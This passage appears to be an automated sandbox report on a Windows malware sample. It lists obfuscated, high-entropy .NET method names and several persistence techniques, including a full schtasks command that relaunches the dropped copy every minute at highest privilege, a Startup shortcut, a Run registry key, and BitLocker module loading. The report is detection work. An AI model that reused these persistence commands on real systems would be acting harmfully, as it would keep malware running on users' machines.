                  Source: TJXpRilNkh.exe.0.dr, 5ux9ggyZSCAev4EoyLa6sCU5Ab4KD3p89aYkTFwvyCRLPMutbNUpWStEbcOL8P28faV.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'EjLA1vnfP2Pl3rNVbNXHjnpJyy', 'MMPvZvifa0eTeSpmYOfYHfLYkK', 'WWMnJyTBijor2naY3fHylieKXx', '_9EjKudeoGM8HgOfXMfifRP1sor'
                  Source: TJXpRilNkh.exe.0.dr, DTPYNQ3UugQdtB65ZVHD6e1lZGyGpii428kes6he0Ugprr9hAQlmnchYlYpHqlDEGOqCTq5oQiE5wG36aIF1WZ1uNEWbJypubSS.csHigh entropy of concatenated method names: 'gHP1Yem231p3k6n38Jl2N85X3XjMw5DUYmkk8NYFhSCfpHk9tuw9VabTNZAVT1fGSoaAYVeZkiFi7L3ixTVPxLsaad0gXs2kiQs', 'DeqcYUfl0srwhagvQM1STvSCDOLcgNMdaY8y0Q7sYZTb9jC5SLO0RH301EQ9RABtNU8qcZ1UH90F0eUCMyPEkQvYW5tVLbAnHql', 'N0GQJMtZ22AqTAp78SnVMeUlP86o3MJpiqAl76w3jUAKjaveXxGaoTfCdrWi6A3YnOX1gbNhzf1apqXGJ21Y', '_3gXQ0WIe5bYyVsfLAp6QkyZe4nZYekLvJB0DBWt5q3ZV5S4SAEXy2qvhBtJ97ltHET03BK1rKb32GWFUDUwF', 'DmtQzHdCCnwD9NLidJnot1eegz8ys91hMJ4zo6Rtu3lmv06HIwR1fYHZNj4QqnrRtE5DEOdcrj1prer1YMPu', 'CzbDHLaduvAh99yXDC6jkQRovZU4fqX1CniM9ShHn5pXcdQnlgU19onymqvJcFMvEHBcWXCs1Mrn5HilOV35', 'KnZe3NjTGlmdMhSx2etV5BjZ7UIduHWmEQFjgLBaEpDPQXBdCP9KHRPlUlBZHKCrRDsQcd2D9k5LYHAQvLdH', '_3qi8oPtpiYeZvWzdUnSnBcJELsP1q00UEfgtzYRXj8TNdN1YK9PRlUMz8XjH7Xhe4kw7cFfnBQT75DSgpPkS', '_9sIxAvIvNBGzMGRe7YF8TpwzF7mLSYlUuj3PHe4WiZFTQWaWWOkj3YXnRuOyzOhhJjDA1u0mjC1RYx7CYmm9', 'ebBghufmDYdZsRA9izogCc1GNkhEEvmNjz3javomnx9Y12sd2uRm4A5Ani2E4KFJYb9z2kO2XQatCDsnmJDV'
                  Source: TJXpRilNkh.exe.0.dr, rsSD4qMRL7xm0dmGDub2hw6w1LhtScmojnax67xqzIwo0FKmZT3Etcj6FeQCSoEBydXYwNIAzwCXXJCjOdl8.csHigh entropy of concatenated method names: 'Z7NQLRPK3SeptgX3OnQloKRPElIakr4Jb3EuFKFa5tORawrGnBkD14Pm3DPuBMoz1u2vjMSiuzF3zYvXl632', 'davQ2TqoFyGDS4MPJQTfuOb5AjA8sauSih70ioZljJuoKhOF6DhkFoadqZyLNZ85PIzomCQZkMIpyVCmzMzb', 'FA9geVvvBgNEMeFtHR01nO8k6saKA9DIGX2hcoe38bKF3MZ1m61NoM9H4oUgcLZmdktMQ69AtfwJ4UbpDvyK', '_87YhJCFynTnTFMedp1qzxjBZzzq3WkpgXwfHRJj7FgTBVTmbDlOttQFKI37tCg6W33ucMD8LPAXhPE4XysMQ', 'cpPJZcvlUAwPefe3r5mpwayYCG4ytI3hi0YhYqOPqOovrntE7hR8FHSgOw0BUujrHeXrjLpUyJ2P6tsLVi0S', 'QFsxa9wtSfmWSLg7L17iJK1Jaq020VXpM2hGfYPG0Spi349mpSrEGFApG2gkK5SMoba1sD5ihnZn8qJzih8O', 'tO2z3QwOfCorqHg86oMXaMS6N1395aFbSjSyzMVcyw6ehNkAPZWoKFFYm7Mcfej915OUfiJZPoUZGGWeavU7', 'MIyamaEpGq0tlRBe8nQVsU827YB6CHzM47HwotNt3Oev7daKylX6leJvCIJVx5TtD0TLQwiWkNAAxCtAazHY', 'atXh9N7pvu6Yc2wewWPsMy7HvIMfI9x2MRyXtixvbbiOjOGNQhMqP1fTiYOQHEABV9OR7hgfdNCxqXlo8J3o', 'cZJnZD9L5e2GhZm23jxajSgOjLoKriVAOh5wLtcbDLtaGIIz2s9ifGvZig0uVuVjXlkPidrfEn7fkywAuCIx'
                  Source: TJXpRilNkh.exe.0.dr, PzOPml7yyBCcKjXoIRiQMRM1BlGUd4VIa6V4KFwHpnH67IPMaKgrMdyRYkf05ZCocG89K4YalbLfBUfVTwBALrycuVhb6kEtgU0.csHigh entropy of concatenated method names: 'lC9Jxj13dw4MYttUqrUEzq4LmsW7BgzW7qAtI72xtvKbK2a2cGsQ608dbCb8e36fgFmQEqLXlmQKrTTcmjlPQM1z6Px03iJe6ko', 'chiMCkTl9ujEwv1QmXXkUuYb2EMVb7zNPyiSmSS2In3aoZZChwNLFrpnAI7U3rWC8wY2e2EhBb18oKSSpibGItRwVTglsixvlUa', 'r2ftTvindq8HaXV8LAmx7022TJnfWxUjXPPXQufOzBXq5pfU7pj8eyycEUCIkC03gXGGITwclzje9jRRLEtKFCbXG7dtKmKA7fb', 'JhrBf2tA5gAgqlsUKfZYtAwNPbGsSuFYkR1lBqcWSUWIGmYsLhQhEqGmfFXg1RtHe3i5qAj6HXQ1N6EkbWNUxs3nXcMlMUpUFLo', 'eWuVtLCIhUSAbDztOZTqyX7sPgzwhmyJX7CATiqwxOJQ9FZiVITHSv6p0D45COFuN1Hr2c8Uep0JpbIYminmL0zkYYm0wr3MuH7', 'AGTv1dRX1k5ISQbyCG4k5g2v7ALhD5wH7DG8IfQ9Ib0wnrtNIeNwpyQm5u2lk2zmCubZ41rGJltahDJFLB0WIyU4DKkPfa8BH4R', 'CMkPb89YEydnxOwbRuq7zX5jHJ5kAQsCcEq5AFaLcJHWQylYJADM1odIBS6WFU9GNdzZI9nNmKCSxWYeCbOWqSFWtBgfGGo6HS6', 'tbFcFcuaE6NzU4eMRbmb1ywyzeJH21Ui5OodT2GS6OWFGWRgQYhl9GECdRBTero5Z1WWYigHT1P1peUWV2U9Eiy5RLjizig1gPH', 'iQeNSet6CHU1MOCsHL3ns7BldJiKBm9GNWDiPKDc7sduXbLuNhhtrwsqUa6OWCh5vCKszrUJRBFgn2SQ1oiCedpyVoSJeMdugVb', '_3hoPNO1wSuFDcO8qXBqXBFhKTtm5g6hzP13VckxdYTuhM7hjtwjqOEGpizQnDULkfjxt71naWwuB5HsOu5h6J4M9zIpfqrFgch2'
                  Source: TJXpRilNkh.exe.0.dr, jJs4ARMPwDPanCnddAQg6sNpSmpAFoAzudaD6PVHv3d9KQxRnbZG4r1VrYMXO85zYN8xTLyIy8b8mZlvmSao.csHigh entropy of concatenated method names: 'bnNInY6pR73idqOySgRvaiM1ZJVYRct6iKQiQUSieTA2D51zqU4D1dUJmRX7wYhFfEixles6o6Sta73eqQRl', '_67xsJ61KiTIpO4BugxLToFPChR', '_6yNQ4G8kdmwrZLjvilST2yNC7d', 'Xqln1eRjwNZh9lc94oB4rw4JZp', 'q4yOF8NqK7z3g9RK7oStuAH8np'
                  Source: TJXpRilNkh.exe.0.dr, PP9yI1ZiQFW8T0vwCvyxYnw44x9fEESgEULDxMjjh8UQCWIHoEPbDZNVJPW306LfySe1uVcAEP7H5xdm8vOWmLj306Yk9C9GnEB.csHigh entropy of concatenated method names: 'IlaJq4hjAbFBtSV0jU8r3xnGeJkzF31713Ff75fAG5LtIKe1YH2Arhex8S6fV1wVXtg4yLeWpRAKCktmy4Tkk0xh6qO7lGBBmSO', 'TjksGoXmuWTTZrQDcOSv9FHFfZWUXxYFnypWdqPWDGUQaMBrgyBKw0BpsA0wBsWRcVv0NTFh01dlYcUVQiTx8XdynZAM6hBOXmW', '_8kooXocolCcw7Lq9jQm57QsvDwML9PDi4TbnjC8NqolH90eHwcyhWsXSnymA7QUOfcotPeGJrafbMYCxkaEa4eBD0WOWV4MHuI2', 'G21Do2eoXtQ0xXIbqxstloRaJo', 'ziaT9luLX7Mc0Ua0ceM77ZJWNp', 'dsbPU9SeQEw3IYfCFYM4NDtIZz', 'AYevvdUlqRMUbi3181MtGlIvbL', 'Jr0Agmm5d9i8cYWQMRux3xjXga', 'QHIg5vr38WE4cC5sxExShwkpcI', 'XEDmw2d7deWpnUo3SksSEhVYih'
                  Source: TJXpRilNkh.exe.0.dr, Nkogr82R2d1tZimBm8G0nqVzqkKSdoWqsltzj7NUlKOE0hHqLUxl3QKAOaqwg1yTYP8ZaJGeXnM23kP2D1122pVoqGVBMZgCwG4.csHigh entropy of concatenated method names: 'zyoRWLmQNcWOxWSO3LK2VBcRDu5oULsSURawvxzkaqutOCeOOJI6ketLvT0YErYYFXRdSvn6rcpkE0sZKtkO5sZoNhTFxCis5b8', 'yJ8ib8g8a3YO7HzqYp6MCn0YNEZklLYaOq3qhZZUs9de6ho2TYEmPlpCpG8Ws58knXXGq7nyI13xcOot0Ub531cst3tY0vP0CCl', 'gy7obP3y0gVR3Y35vAYtRcHmHzpYoQNRtbMitmZLhCc14mYLLm2DwDPnzWH6XErZ3rNmHecO9f9a5CjJjymUF9U9V15sT5tZXko', 'XYMdzI73lDgmzZ2yCtvDLwF2qLoWUtyqek106TLlMGQPEziodNRy9PROE04GH8QEEWb9itXQkfLQjlwCcUzTJ3DIIP9WS2kLPXX', '_6YTCeLvVnxgrzFHbDQIlXI32DLAWE9rDOnz9IMiAw04y6myUCidF1ZDBCfOZ2g2HVX3lby39Nu2wNaslBGdSvPlUAjSYyvSR67j', 'jAPwykflgGduEU4NGKPyQmok0NO32P70Wmx1bUNUrAsyvB8QJKN8DGXi49BB6TELuQbz0qKXmu418YrUcoAMHgESEaPxdqnXAiZ', 'dl2ute5WIKuyEQ3WM3vUmZtggsevGwK2msdXY7YQeGDUsIwEihdsr34j5UmZo8l09qqCfJP0OOM6q8TkoIlRWL0aVP2pgY15ndA', 'W9HNluOQvy9o6Pu2NaCaTpe8uvzYG6eKBRlSz8orIh0CMfSUnq2NwrWeOXp5BTDfXJQDUGS1BYN7UHLoo6UMR254KKfZuSpEEDP', 'DNL7IscQegJYXhuchq2l9ECaYfOgjY3cD8Nr2SC9A5eQavpbA6aYkHDwwttpaxsewghJI1JumHNLzNxIMeJlVz5RYcuthKQUNPT', 'lKQW8FncM0lvB0brF9gUlZ82JWUE1iCuBOXHLTtCC9inZXES5cq7IzBF5joQr0UySCLxsR1UpXW9o1wo5UJXiyDjz2YbOydP4KF'
                  Source: TJXpRilNkh.exe.0.dr, ND8ILYiiFIGEo3pzU3VmmJ0ddDdERVyYnAJeIaXAF2hVhnkH5pMAi50b7Sc5naHBSxM.csHigh entropy of concatenated method names: '_0TtkUTVOHr5Dkc0OfNwVvEtoBS2cO9LYaJNTRRxPMFPNv6Z73gUl19oL0gh4vpPQpAN', 'X7Hl90LYY9rTUGnO19L6hBzGm05xKMn42jHntRw8ANASYSsPC23QZIorZUfhnbWaASs', 'DlKWV4PG5CZ2MMXZ6Kgkg5GLBKxn7LHhxAbBbuo2TNSMG2lHGcho8iJhBVCAW54wArO', 'eKH1u8zkaBHFXFYM9k10Eq8hReqKpd9viOTKK72fX4C3OnOUbRom3AO9NdB0iDhsd8n', 'cTKfArzd1GaCnc7GUJIcMGIKMhkjNqJtdUZQEzI3XETt1uwzDRFYR0mRoP7S4qN39mv', 'NrZFe0Zs0UpvVBsRP2g50bJ5gq', '_4LbTMngKPlShkFCBMyKOMcAXjf', 'XvCHW60MnjGBgAXKFwgJTdVYPk', 'ncOGK6OGSQRaOpHFaL5jTJne0T', 'dneee4u3HUKX1VAYD3KFjy2d9p'
                  Source: TJXpRilNkh.exe.0.dr, Loa829qR9ROntzp7MYzhIcStiPKKU1HqqPoPaf2e9E5dAbwFGBWRJJShykytM1LLNhnwpBpSLa87dgkzyXr1JhthoAWC5zpxfKr.csHigh entropy of concatenated method names: 'yn7NerDdE0urGe6z7flkyE5tlbfykfBEeGq3I4vrkCXBT9eGaos7QqpJ3QQt88K0PRhu9YoVS1piUaKjX4jxruJehFD81DhpbPi', 'HEAT7JbSEV5YrYsaTyio0aOb2e', '_0GPp8HsMMbJtaetJpGGIibqHsQ', '_7JyE2BQdxMQvpNCG3xWWm8vijJ', 'D7DYDuCZfiUPcSQ0nJImqLdum6'
                  Source: TJXpRilNkh.exe.0.dr, wGxByFRheuXlnAtF6wayMK4XwcGb1YUM70dZQeRvnPiJvyZAHpPAVAVrXZ6XM1tlL7tCIO4tIXvOtE6GGAQd.csHigh entropy of concatenated method names: 'bzETCl5smKzWDW3LKDus1VX8Vnde74DUXqtQBNpZ9xfPCIgf275ZgvUTDl3r36a8sznhaDwiwRilkEv5hrcC', 'bx5gJoHu8U5IuEIrUItx5bchvHjoXEXacNlSJkQ8rIZvvyyyk9G9zCkzsU34H3PPi8EzXvIE2cBDHRvHrAui', 'NulwL9bLEVQtsEOFvwQO6XuvBko7mlBRwinzpnEVpc3FDsSknh4ZG1ZOeLB1YMV67TJO04MoykbYsFyu3VQT', 'Q0uUdg2dzveL8peG1RBuwY5mdsVdyj3yr6zTPBGZW77oVgniU4pA4GU1UeKzKef39hQiLePIC1PXN7pB3dyJ', '_5ejIHz2TIPTCwnAaqmp5L9ALiT', 'oj0ur4DxZhYYURsJ5FXmA14pEm', 'mvf5rax4Dr5MhF1xZcDKpeg2ew', 'V5HT8YZaTlJa7EGkZ7zYIJbgDA', 'owEd1T4KwxaJz6z2kLgE3qseQA', '_4oiJw8HdEIFrGFvJquXX08xwpW'
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeFile created: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeJump to dropped file

                  Boot Survival

                  barindex
                  Uses schtasks.exe or at.exe to add and modify task schedules
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "TJXpRilNkh" /tr "C:\Users\user\AppData\Roaming\TJXpRilNkh.exe"
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TJXpRilNkh.lnkJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TJXpRilNkh.lnkJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TJXpRilNkhJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TJXpRilNkhJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Loading BitLocker PowerShell Module
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
